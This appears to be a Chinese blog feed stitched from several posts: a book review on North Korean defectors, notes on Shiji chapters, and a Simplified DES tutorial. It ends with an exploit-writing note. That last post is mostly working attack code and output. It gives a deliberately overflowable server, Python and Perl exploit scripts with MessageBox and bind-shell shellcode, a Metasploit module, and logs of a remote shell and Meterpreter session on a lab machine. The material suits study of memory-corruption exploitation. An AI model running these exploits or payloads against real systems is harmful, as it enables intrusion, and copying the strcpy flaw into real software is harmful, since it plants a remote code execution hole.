<p>当再次在南韩相见时,美兰已经已经三十一岁,他们失去联系已经六年多,此时的美兰已为人妇。“如果你计划来南韩,为什么不早点来”,美兰问道。俊相回答不出这个问题。当谈话到了这个时候,美兰哭了起来,她的话暗示得很清楚。她结婚了有孩子。一切都太迟了。你可以说是他们的谨慎小心懦弱,相互之间都隐藏着北逃的想法造成了这样的凄凉结局。但是他们真的不想告诉对方吗,难道不是因为北韩无处不在的秘密警察对于人们的监视造成了即使是最亲近的人都无法把最深处的想法告诉对方吗,难道不是因为金家极权造成这样的悲剧吗。现实永远比电影更具戏剧化。</p>
<p>当成功脱离北韩,进入南韩这片应许之地后并不意味着幸福的开始。在经历了大半生的北韩生活,习惯了自己的一切都被国家所安排之后,脱北者刚来南韩时往往都会无所适从。他们必须在有着无限可能的新世界里,重新定位自己。选择在哪里居住,做什么,甚至每天早上穿什么衣服,对于我们这些习惯做选择的人来说都很困难,对于那些习惯于一生里国家替他们做所有决定的人来说,就简直像是梦魇了。南北韩之间的差距之大,据一项经常被引用的统计数据显示,北韩与南韩之间的经济差距,四倍于一九九零年两德统一时,东西德之间的差距。正是如此,有些人竟然还会怀念在北韩的生活。惯性的力量多么可拍。</p>
<p>我希望大家都能去读读这本《我们最幸福》,而不是简单的在网上嘲笑三胖,嘲笑北韩。我希望大家都能试着去理解这个悲剧的国度,去体会这个苦难民族下普通百姓的生活。</p>
《史记·殷本纪第三》笔记2014-04-21T00:00:00+00:00http://terenceli.github.io/%E7%94%9F%E6%B4%BB/2014/04/21/yinbenji
<p>史记的这篇能记的不多,是讲殷商的历史的。</p>
<p>首先说说伊尹这个人,相传伊尹为了认识汤,作为有莘氏的媵臣,也就是陪嫁奴隶,然后借着向汤做饭的机会向汤讲述做王的道理,分析天下大势。于是汤封他做了宰相。据传伊尹也是一代名厨,由厨师到宰相,这跨度还是有点大,这充分说明别拿厨师不当人才。</p>
<p>伊尹历事商超汤、外丙、仲壬、太甲、沃丁五代帝王,为商超立下汗马功劳。这种权臣一般都容易出问题,还好伊尹是个好人。太甲即为时,暴虐,不遵汤法,乱德。于是伊尹将其流放到了桐宫。三年之后,太甲改过自新,伊尹再次迎回太甲,帝太甲也成了一个好皇帝。</p>
<p>《殷本纪》其实记录得比较流水,大概就是x崩,y立。y崩,z立。这种格式,只有对最后一位昏君商纣介绍得比较详细。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>帝纣资辨捷疾,闻见甚敏;材力过人,手格猛兽;知足以距谏,言足以饰非;矜人臣以能,高天下以声,以为皆出己之下。
</code></pre></div></div>
<p>上面是太史公对纣的描写。单从前四句确实奇才,有这种资质,加上生在帝王之家,确实是很容易骄傲自大,“以为皆出己之下”,这是有多狂妄。纣真的是各种荒淫无道。因为九侯的女儿不喜欢这种荒淫,尽然连累父亲被杀,鄂侯因为争论也被杀,西伯昌因为悄悄叹了一口气就被流放。还好昌的手下进献各种宝物才让西伯免于一死。而之后才有了西伯之后纣,武王伐纣的历史。</p>
<p>我从小遇到的聪明人不少,而正如吕老师所说,如果聪明没有办法转换成智慧,那就什么都不是。我觉得聪明的人第一点就是千万不要自大,不管是家境,智力都不应该是傲慢的资本,更不用那些技术了。不知道那些聪明的家伙现在都怎么样了。</p>
《史记·夏本纪第二》笔记2014-04-20T00:00:00+00:00http://terenceli.github.io/%E7%94%9F%E6%B4%BB/2014/04/20/xiabenji
<p>这篇读完也就结束了尧舜禹禅让的时代,进入了皇权世袭制的时代。这里记录下关于禅让与世袭的一些思考。</p>
<p>读过《五帝本纪》的人都知道,其实五帝都是一个家族的,都是黄帝的后代,但是后代为什么把这个世袭的罪责归到了禹身上。大概是因为黄帝传了后代之后,出现了尧舜禹禅让(虽然是一家人,其实关系已经很远了),而禹传启之后再也没有过禅让了,世袭成为大家所公认的制度。</p>
<p>尧死后,舜也曾经让过帝位给尧的儿子丹朱,但是当时的人们都知道舜的贤能,而不去朝见丹朱(估计丹朱也知道自己没戏),舜就自然当上了皇帝。</p>
<p>同样的情况出现在禹跟舜的儿子商均身上,禹也是假吧意思的让了一下,天下人还是去朝见禹,然后禹也当上了皇帝。</p>
<p>禹选择继承人的时候本身也没有想过自己的儿子,他先选的是皋陶,是禹时代的一个贤臣。但是不幸的是,皋陶死了。接着又选了益来掌管国家大事,但是益辅佐禹的时间并不长,并没有得到天下人的认同。禹意思,他也让位给禹的儿子启,而恰恰是这个启,又是一个十分贤能的人,大家就都认他,而不认益了。</p>
<p>“禹传子,家天下”的说法就来了。</p>
<p>我们回过头来看看这个禅让制,它的思想是通过在位的君主来挑选那些贤能继承自己的帝位,人本身不可能没有私心。尧舜禹可以说是做到了没有私心,但是这维持了多久呢。这再一次说明了制度的重要胜于人事。后人只需要按照制定的制度做就行,而谁能保证君主始终是一个贤君呢。</p>
<p>一个身处全力顶峰的人很容易受到人民的狂热崇拜以至于犯下错误而不可知,我第一次读到“皋陶于是敬禹之德,令民皆则禹。不如言,刑从之。”这句话的时候还是震惊了一下的,不顺从他说的,就要受刑罚。这不是一个黑暗的社会吗。美国在罗斯福之前总统不超过两届的习惯是大家效仿开国之父华盛顿的两届离职,而罗斯福因为经济危机和二战连任四届总统,似乎也是无可厚非。然后美国在战后还是通过修宪制定了总统任期不能超过两届的修正案。</p>
<p>这是一种对制度的信任。</p>
Simplified DES简介2014-04-17T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/04/17/SDES
<!--script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=default"-->
<!-- mathjax config similar to math.stackexchange -->
<script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS_HTML" type="text/javascript"></script>
<p>Simplified DES是由Edard Schaefer教授开发的用于教学的简单加密算法,它与DES有着相似的属性与结构,只是参数比较小而已。通过这种简单的,能够实现手工加解密的算法能让我们加深对DES的理解。</p>
<h3>概述</h3>
<p>图1是simplified DES(下称S-DES)的总体结构图。S-DES加密算法使用8位明文(如10111101)和10位密钥作为输入,产生8位密文。相反的,S-DES解密算法使用8位密文和10位相同的密钥作为输入,生产8位明文。</p>
<p><img src="/assets/img/sdes/1.png" alt="" /></p>
<p>加密算法包括5个函数:初始的置换函数(\(IP{}^{}\));一个复杂的函数\(f{}_{k}\),这个函数包括取决于输入的置换和替换操作;一个简单的置换函数\(SW\),用于置换输入数据的前后2个部分;然后又是\(f{}_{k}\);最后是初始置换函数的逆(\(IP{}^{-1}\))。</p>
<p>\(f{}_{k}\)的输入包括明文和8位密钥,我们可以使用16位的密钥,每一轮使用8位(共两轮\(f{}_{k}\)),也可以使用8位密钥,每一次都使用相同的密钥。作为折中,我们使用了10位密钥,每一次的\(f{}_{k}\)通过移位产生8位密钥。两个密钥的产生如图2:</p>
<p><img src="/assets/img/sdes/2.png" alt="" /></p>
<p>这个算法中,密钥首先通过一个置换函数(\(P10\))。然后左移一位,输出通过一个置换函数(\(P8\)),产生第一个密钥\(K_{1}\)。左移一位之后的结果再进行移位和置换(\(P8\)),产生第二个密钥\(K_{2}\)。</p>
<p>我们将S-DES的加密算法使用函数组合表达如下:</p>
\[IP^{-1}\circ f_{K_{2}}\circ SW\circ f_{K_{1}}\circ IP\]
<p>也就是</p>
\[ciphertext = IP^{-1}(f_{K_{2}}(SW(f_{K_{1}}(IP(plaintext)))))\]
<p>其中</p>
\[K_{1} = P8(Shift(P10(key)))
K_{2} = P8(Shift(Shift(P10(key))))\]
<p>解密算法也在图1中,可以表示成加密算法的逆运算。</p>
\[plaintext = IP^{-1}(f_{K_{1}}(SW(f_{K_{2}}(IP(ciphertext)))))\]
<h3>S-DES密钥生成</h3>
<p>图2显示了子密钥的生成。</p>
<p>首先,按照一定方式对输入密钥进行置换。如输入的10位密钥是\((k_{1},k_{2},k_{3},k_{4},k_{5},k_{6},k_{7},k_{8},k_{9},k_{10})\)。 \(P10\)如下定义:</p>
\[P10(k_{1},k_{2},k_{3},k_{4},k_{5},k_{6},k_{7},k_{8},k_{9},k_{10}) = (k_{3},k_{5},k_{2},k_{7},k_{4},k_{10},k_{1},k_{9},k_{8},k_{6})\]
<p>P10可以简单表示如下:</p>
<p><img src="/assets/img/sdes/3.png" alt="" /></p>
<p>这个表的意思就是说第一个输出是输入的第3位,第二个输出是输入的第5位,以此类推。如,密钥1010000010被置换成1000001100。</p>
<p>接下来进行循环左移一位(LS-1),是将密钥分成左右两部分(每部分5位),左右各循环左移一位。这个例子中,得到00001 11000.</p>
<p>接着执行\(P8\),从10位输出中选出8位密钥,P8定义如下:</p>
<p><img src="/assets/img/sdes/4.png" alt="" /></p>
<p>结果就是第一个子密钥(\(K_{1}\)),在我们这个例子中,是10100100。</p>
<p>然后利第一次左移一位产生的一对5位数据(00001 11000)进行左移两位。这个例子中的结果是00100 00011。最后,通过P8之后结果产生 \(K_{2}\)。这个例子中是01000011。</p>
<h3>S-DES加密</h3>
<p>图3展示了S-DES加密算法的细节。这部分详细介绍加密流程中的5个函数。</p>
<p><img src="/assets/img/sdes/5.png" alt="" /></p>
<p>初始和结尾的置换函数:</p>
<p>对于输入的8位明文,我们需要使用\(IP\)对其进行重新置换:</p>
<p><img src="/assets/img/sdes/6.png" alt="" /></p>
<p>在算法末尾,需要进行相反的操作:</p>
<p><img src="/assets/img/sdes/7.png" alt="" /></p>
<p>可以验证\(IP^{-1}(IP(X)) = X\)。</p>
<p>\(f_{K}\)函数:</p>
<p>S-DES中最复杂的部分就是函数\(f_{K}\)了,这个函数包含了置换的和替换的组合。这个函数解释如下。首先让L和R分别表示\(f_{K}\)8位输入的左边4位和右边4位,F是一个4位到4位的映射。则</p>
\[f_{K}(L,R) = (L\oplus F(R,SK),R)\]
<p>SK是一个子密钥。</p>
<p>下面解释F。它的输入是4位数\((n_{1} n_{2} n_{3} n_{4})\),第一个操作是扩展与置换:</p>
<p><img src="/assets/img/sdes/8.png" alt="" /></p>
<p>为了方便起见,写成如下形式:</p>
<p><img src="/assets/img/sdes/9.png" alt="" /></p>
<p>将8位的子密钥\(K_{1} = (k_{11},k_{12},k_{13},k_{14},k_{15},k_{16},k_{17},k_{18})\)与上面的数进行异或:</p>
<p><img src="/assets/img/sdes/10.png" alt="" /></p>
<p>重新命名这8个数:</p>
<p><img src="/assets/img/sdes/11.png" alt="" /></p>
<p>前面4位用于在第一个S盒产生一个2位输出,后面4位在第二个S盒产生一个2位输出,两个S盒定义如下:</p>
<p><img src="/assets/img/sdes/12.png" alt="" /></p>
<p>S盒操作如下:第一个和第四个输入作为一个2位数指定S盒中的一行,第二和第三个输入作为一个2位数指定S盒中的一列。比如\((p_{0,0}p_{0,3})=(00)\) 和\((p_{0,1}p_{0,2})=(10)\) ,则输出是S盒的第一行第二列这里是3(二进制的11),类似的\((p_{1,0}p_{1,3})\) 和\((p_{1,1}p_{1,2})\)的值找到在第二个S盒中的值。</p>
<p>接着,由两个S盒产生的4位置通过一个置换函数\(P4\):</p>
<p>\(P4\)的输出就是F的输出。</p>
<p>SW函数:</p>
<p>\(f_{K}\)函数仅仅处理左边的4位,SW函数将左右互换然后就处理了后面的4位。第二轮的\(f_{K}\)中,E/P,S0,S1和P4都跟第一轮一样的,只有子密钥变成了\(K_{2}\)。</p>
<p>在网上找到了一个S-DES的例子,希望大家能自己走一遍流程。</p>
<p><a href="/assets/file/mimaxue/SDES.pdf">S-DES</a></p>
《史记·五帝本纪第一》笔记2014-04-15T00:00:00+00:00http://terenceli.github.io/%E7%94%9F%E6%B4%BB/2014/04/15/wudibenji
<p>最近因为在Coursera上面跟台大吕世浩老师的《史记》,自己准备重新认真学习一下史记。在这里做些笔记。</p>
<p>《史记》是我在高中的时候看的,当时关注的是优美的文字与故事情节,现在听了吕世浩老师的课,觉得很有必要重新看一遍,
然后自己买了三家注的《史记》,繁体竖版,质量好,很值得收藏啊。</p>
<p>上周周末把《史记》第一篇《五帝本纪第一》看完了,在这里做个总结。</p>
<p>首先五帝的关系如下图所示:</p>
<p><img src="/assets/img/wudibenji/1.PNG" alt="" /></p>
<p>图中红色字体表示的就是五帝。</p>
<p>黄帝:不用多说了,所谓的炎黄子孙中的黄就是他。黄帝通过阪泉之战战胜了炎帝,通过逐鹿之战战胜了蚩尤,得有天下。</p>
<p>高阳:就是颛顼了。</p>
<p>高辛:就是帝喾。</p>
<p>放勋:帝尧,他哥挚当皇帝不行,他就上了。</p>
<p>重华:帝舜,帝尧到帝舜这都隔了多少代了,神话还是神话啊。</p>
<p>尧舜禅让历来为人们所乐道,部落联盟推举制度也是自古就有的。尧舜禅让与部落联盟推举天子的制度至少有三方面的不同。</p>
<p>生让:其他部落联盟推举天子都是前一任的天子死掉,大家再决定下一任的继承者,尧舜都是活着就在找人了;</p>
<p>侧陋:是说尧找继承人的时候不是说一定要身边的贵族,即使是民间隐匿者也可以是,只要你有能力;</p>
<p>试可:这是最重要的,因为是生让,所以才可以试可,在活着的时候就要多方考验这个人,看这个人足不足以担当大任。</p>
<p>这是三个最重要的不同,也是中国文化的精神。这种精神是说天下乃是重器,不可轻易授之于人。所谓“夫天下至重也”。因为至重,交给一个人的时候一定要格外小心,不能够有自己的私心,也要多方考验,这个人是否足以承担大任。这就是中国人禅让真正的思想。</p>
<p>五帝本纪上说:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>自黄帝至舜、禹,皆同姓而异其国号,以章明德。故黄帝为有熊,帝颛顼为高阳,帝喾为高辛,帝尧为陶唐,帝舜为有虞。帝禹为夏后而别氏,姓姒氏。契为商,姓子氏。弃为周,姓姬氏。
</code></pre></div></div>
<p>这段话是说夏商周三代以前的历代帝王全都是黄帝的子孙。司马迁以此找出一个天下一家的来源,相信所有的人都有共同的来源,太史公所以以黄帝为中华民族的始祖,就是这个原因。</p>
<p>自古三皇五帝就有很多传说,《尚书》记载的是尧以来的事,百家言黄帝各有各的说法,那个时候各种传说流传,缙绅也不知道怎么评价黄帝。作为历史学家的司马迁怎么办呢?</p>
<p>“余尝西至空桐,北过涿鹿,东渐於海,南浮江淮矣,至长老皆各往往称黄帝、尧、舜之处,风教固殊焉,总之不离古文者近是。”</p>
<p>司马迁于是走访各处,访问当地的人民,查阅古籍,得出了“不离古文者近是”的结论。司马迁写下一句意味深长的话:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>非好学深思,心知其意,固难为浅见寡闻道也。
</code></pre></div></div>
<p>太史公为了后来读《史记》的人确立一个阅读的基本原则:要读懂我这本书,一定要是好学深思,心知其意的人。</p>
<p>读完《五帝本纪》需要注意一个现象,整篇文章只言治不言乱,并不是因为太史公捏造事实,而是太史公觉得这是中国最好的政治理想,而且他相信这个理想曾经是存在过的。</p>
exploit编写笔记3——编写Metasploit exploit2014-04-08T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/04/08/metasploit
<p>这是exploit编写笔记第三篇,编写metasploit exploit。
首先,编写一个带有缓冲区溢出漏洞的服务器端程序。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// server.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <iostream.h>
#include <winsock.h>
#include <windows.h>
//load windows socket
#pragma comment(lib, "wsock32.lib")
//Define Return Messages
#define SS_ERROR 1
#define SS_OK 0
void pr( char *str)
{
char buf[500]="";
strcpy(buf,str);
}
void sError(char *str)
{
MessageBox (NULL, str, "socket Error" ,MB_OK);
WSACleanup();
}
int main(int argc, char **argv)
{
WORD sockVersion;
WSADATA wsaData;
int rVal;
char Message[5000]="";
char buf[2000]="";
u_short LocalPort;
LocalPort = 200;
//wsock32 initialized for usage
sockVersion = MAKEWORD(1,1);
WSAStartup(sockVersion, &wsaData);
//create server socket
SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);
if(serverSocket == INVALID_SOCKET)
{
sError("Failed socket()");
return SS_ERROR;
}
SOCKADDR_IN sin;
sin.sin_family = PF_INET;
sin.sin_port = htons(LocalPort);
sin.sin_addr.s_addr = INADDR_ANY;
//bind the socket
rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
if(rVal == SOCKET_ERROR)
{
sError("Failed bind()");
WSACleanup();
return SS_ERROR;
}
//get socket to listen
rVal = listen(serverSocket, 10);
if(rVal == SOCKET_ERROR)
{
sError("Failed listen()");
WSACleanup();
return SS_ERROR;
}
//wait for a client to connect
SOCKET clientSocket;
clientSocket = accept(serverSocket, NULL, NULL);
if(clientSocket == INVALID_SOCKET)
{
sError("Failed accept()");
WSACleanup();
return SS_ERROR;
}
int bytesRecv = SOCKET_ERROR;
while( bytesRecv == SOCKET_ERROR )
{
//receive the data that is being sent by the client max limit to 5000 bytes.
bytesRecv = recv( clientSocket, Message, 5000, 0 );
if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )
{
printf( "\nConnection Closed.\n");
break;
}
}
//Pass the data received to the function pr
pr(Message);
//close client socket
closesocket(clientSocket);
//close server socket
closesocket(serverSocket);
WSACleanup();
return SS_OK;
}
</code></pre></div></div>
<p>向该服务程序发送超过500字节的数据时,会造成其崩溃。下面的python脚本会出发崩溃:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import socket
data = 'A' * 1000
s= socket.socket()
s.connect(('localhost',200))
s.send(data)
s.close()
</code></pre></div></div>
<p><img src="/assets/img/metasploit/1.png" alt="" /></p>
<p>使用mona pattern确定其eip偏移在504。</p>
<p><img src="/assets/img/metasploit/2.png" alt="" /></p>
<p><img src="/assets/img/metasploit/3.png" alt="" /></p>
<p>查找一个push esp ;ret 序列,我们找的是71a22b53,用这个值覆盖eip。shellcode我们随便使用一个Messagebox。</p>
<p>得到一个如下的python脚本:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import socket
data = "A" * 504
#71a22b53
data += "\x53\x2b\xa2\x71"
shellcode = ("\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
"\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
"\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
"\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
"\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
"\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
"\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
"\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
"\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57"
"\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
"\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
"\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
"\x40\xFF\x54\x24\x40\x57\xFF\xD0")
data+=shellcode
s= socket.socket()
s.connect(('localhost',200))
s.send(data)
s.close()
</code></pre></div></div>
<p>运行成功:</p>
<p><img src="/assets/img/metasploit/4.png" alt="" /></p>
<p>我们再使用一个绑定端口的的payload,下面的payload将shell绑定到tcp 5555端口:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#
print " --------------------------------------\n";
print " Writing Buffer Overflows\n";
print " Peter Van Eeckhoutte\n";
print " http://www.corelan.be:8800\n";
print " --------------------------------------\n";
print " Exploit for vulnserver.c\n";
print " --------------------------------------\n";
use strict;
use Socket;
my $junk = "\x90" x 504;
#jmp esp (from ws2_32.dll)
my $eipoverwrite = pack('V',0x71a22b53);
#add some NOP's
my $shellcode="\x90" x 50;
# windows/shell_bind_tcp - 702 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, LPORT=5555, RHOST=
$shellcode=$shellcode."\x89\xe0\xd9\xd0\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58" .
"\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42" .
"\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" .
"\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42\x4a" .
"\x4a\x4b\x50\x4d\x4d\x38\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f" .
"\x45\x30\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47\x35" .
"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x45\x51\x4a\x4f" .
"\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x43\x31" .
"\x4a\x4b\x47\x39\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e" .
"\x50\x31\x49\x50\x4a\x39\x4e\x4c\x4c\x44\x49\x50\x42\x54" .
"\x45\x57\x49\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b" .
"\x4c\x34\x47\x4b\x46\x34\x46\x44\x51\x38\x42\x55\x4a\x45" .
"\x4c\x4b\x51\x4f\x51\x34\x43\x31\x4a\x4b\x43\x56\x4c\x4b" .
"\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b" .
"\x44\x43\x46\x4c\x4c\x4b\x4b\x39\x42\x4c\x51\x34\x45\x4c" .
"\x45\x31\x49\x53\x46\x51\x49\x4b\x43\x54\x4c\x4b\x51\x53" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x51\x50\x44\x48\x51\x4e\x43\x58\x4c\x4e" .
"\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f\x4e\x36\x45\x36" .
"\x51\x43\x42\x46\x43\x58\x46\x53\x47\x42\x45\x38\x43\x47" .
"\x44\x33\x46\x52\x51\x4f\x46\x34\x4b\x4f\x48\x50\x42\x48" .
"\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48\x56" .
"\x51\x4f\x4c\x49\x4d\x35\x43\x56\x4b\x31\x4a\x4d\x45\x58" .
"\x44\x42\x46\x35\x43\x5a\x43\x32\x4b\x4f\x4e\x30\x45\x38" .
"\x48\x59\x45\x59\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56" .
"\x51\x43\x50\x53\x50\x53\x46\x33\x46\x33\x51\x53\x50\x53" .
"\x47\x33\x46\x33\x4b\x4f\x4e\x30\x42\x46\x42\x48\x42\x35" .
"\x4e\x53\x45\x36\x50\x53\x4b\x39\x4b\x51\x4c\x55\x43\x58" .
"\x4e\x44\x45\x4a\x44\x30\x49\x57\x46\x37\x4b\x4f\x4e\x36" .
"\x42\x4a\x44\x50\x50\x51\x50\x55\x4b\x4f\x48\x50\x45\x38" .
"\x49\x34\x4e\x4d\x46\x4e\x4a\x49\x50\x57\x4b\x4f\x49\x46" .
"\x46\x33\x50\x55\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x51\x59" .
"\x4c\x46\x51\x59\x51\x47\x4b\x4f\x49\x46\x46\x30\x50\x54" .
"\x46\x34\x50\x55\x4b\x4f\x48\x50\x4a\x33\x43\x58\x4b\x57" .
"\x43\x49\x48\x46\x44\x39\x51\x47\x4b\x4f\x4e\x36\x46\x35" .
"\x4b\x4f\x48\x50\x43\x56\x43\x5a\x45\x34\x42\x46\x45\x38" .
"\x43\x53\x42\x4d\x4b\x39\x4a\x45\x42\x4a\x50\x50\x50\x59" .
"\x47\x59\x48\x4c\x4b\x39\x4d\x37\x42\x4a\x47\x34\x4c\x49" .
"\x4b\x52\x46\x51\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x47\x32" .
"\x46\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a" .
"\x46\x58\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x43\x42\x4b\x4e" .
"\x48\x33\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56" .
"\x51\x4b\x46\x37\x50\x52\x50\x51\x50\x51\x50\x51\x43\x5a" .
"\x45\x51\x46\x31\x50\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30" .
"\x43\x58\x4e\x4d\x49\x49\x44\x45\x48\x4e\x46\x33\x4b\x4f" .
"\x48\x56\x43\x5a\x4b\x4f\x4b\x4f\x50\x37\x4b\x4f\x4e\x30" .
"\x4c\x4b\x51\x47\x4b\x4c\x4b\x33\x49\x54\x42\x44\x4b\x4f" .
"\x48\x56\x51\x42\x4b\x4f\x48\x50\x43\x58\x4a\x50\x4c\x4a" .
"\x43\x34\x51\x4f\x50\x53\x4b\x4f\x4e\x36\x4b\x4f\x48\x50" .
"\x41\x41";
# initialize host and port
my $host = shift || '192.168.10.130';
my $port = shift || 200;
my $proto = getprotobyname('tcp');
# get the port address
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);
print "[+] Setting up socket\n";
# create the socket, connect to the port
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
print "[+] Connecting to $host on port $port\n";
connect(SOCKET, $paddr) or die "connect: $!";
print "[+] Sending payload\n";
print SOCKET $junk.$eipoverwrite.$shellcode."\n";
print "[+] Payload sent\n";
print "[+] Attempting to telnet to $host on port 5555...\n";
system("telnet $host 5555");
close SOCKET or die "close: $!";
</code></pre></div></div>
<p>下面是输出:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~# perl sploit.pl 192.168.10.130 200
--------------------------------------
Writing Buffer Overflows
Peter Van Eeckhoutte
http://www.corelan.be:8800
--------------------------------------
Exploit for vulnserver.c
--------------------------------------
[+] Setting up socket
[+] Connecting to 192.168.10.130 on port 200
[+] Sending payload
[+] Payload sent
[+] Attempting to telnet to 192.168.10.130 on port 5555...
Trying 192.168.10.130...
Connected to 192.168.10.130.
Escape character is '^]'.
Microsoft Windows XP [�汾 5.1.2600]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.
D:\Program Files\Microsoft Visual Studio\MyProjects\server\Debug>dir
dir
������ D �еľ�û�б�ǩ��
��������� 0EAA-0461
D:\Program Files\Microsoft Visual Studio\MyProjects\server\Debug ��Ŀ¼
2014-04-07 17:22 <DIR> .
2014-04-07 17:22 <DIR> ..
2014-04-07 16:56 172,124 server.exe
2014-04-07 16:56 185,136 server.ilk
2014-04-07 16:56 25,594 server.obj
2014-04-07 17:22 43,520 server.opt
2014-04-07 16:56 203,728 server.pch
2014-04-07 16:56 353,280 server.pdb
2014-04-07 16:56 2,203 StdAfx.obj
2014-04-07 17:23 91,136 vc60.idb
2014-04-07 16:56 135,168 vc60.pdb
9 ���ļ� 1,211,889 �ֽ
2 ��Ŀ¼ 16,896,925,696 �����ֽ
</code></pre></div></div>
<p>成功得到了存在漏洞服务器的shell。</p>
<p>将exploit转换成metasploit,现在先贴代码,以后有时间仔细研究这个的写法。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#
#
# Custom metasploit exploit for vulnserver.c
# Written by Peter Van Eeckhoutte
#
#
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Custom vulnerable server stack overflow',
'Description' => %q{
This module exploits a stack overflow in a
custom vulnerable server.
},
'Author' => [ 'Terenceli ' ],
'Version' => '$Revision: 9999 $',
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1400,
'BadChars' => "\x00\xff",
},
'Platform' => 'win',
'Targets' =>
[
['Windows XP SP3 CHS',
{ 'Ret' => 0x71a22b53, 'Offset' => 504 } ],
['Windows 2003 Server R2 SP2',
{ 'Ret' => 0x71c02b67, 'Offset' => 504 } ],
],
'DefaultTarget' => 0,
'Privileged' => false
))
register_options(
[
Opt::RPORT(200)
], self.class)
end
def exploit
connect
junk = make_nops(target['Offset'])
sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded
sock.put(sploit)
handler
disconnect
end
end
</code></pre></div></div>
<p>在xpsp3上的测试:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msf exploit(server) > set RHOST 192.168.10.130
RHOST => 192.168.10.130
msf exploit(server) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(server) > exploit
[*] Started bind handler
[*] Sending stage (769024 bytes) to 192.168.10.130
[*] Meterpreter session 2 opened (192.168.10.129:50459 -> 192.168.10.130:4444) at 2014-04-07 20:46:05 +0800
meterpreter > sysinfo
Computer : CHINA-CE09C2DA6
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : zh_CN
Meterpreter : x86/win32
</code></pre></div></div>
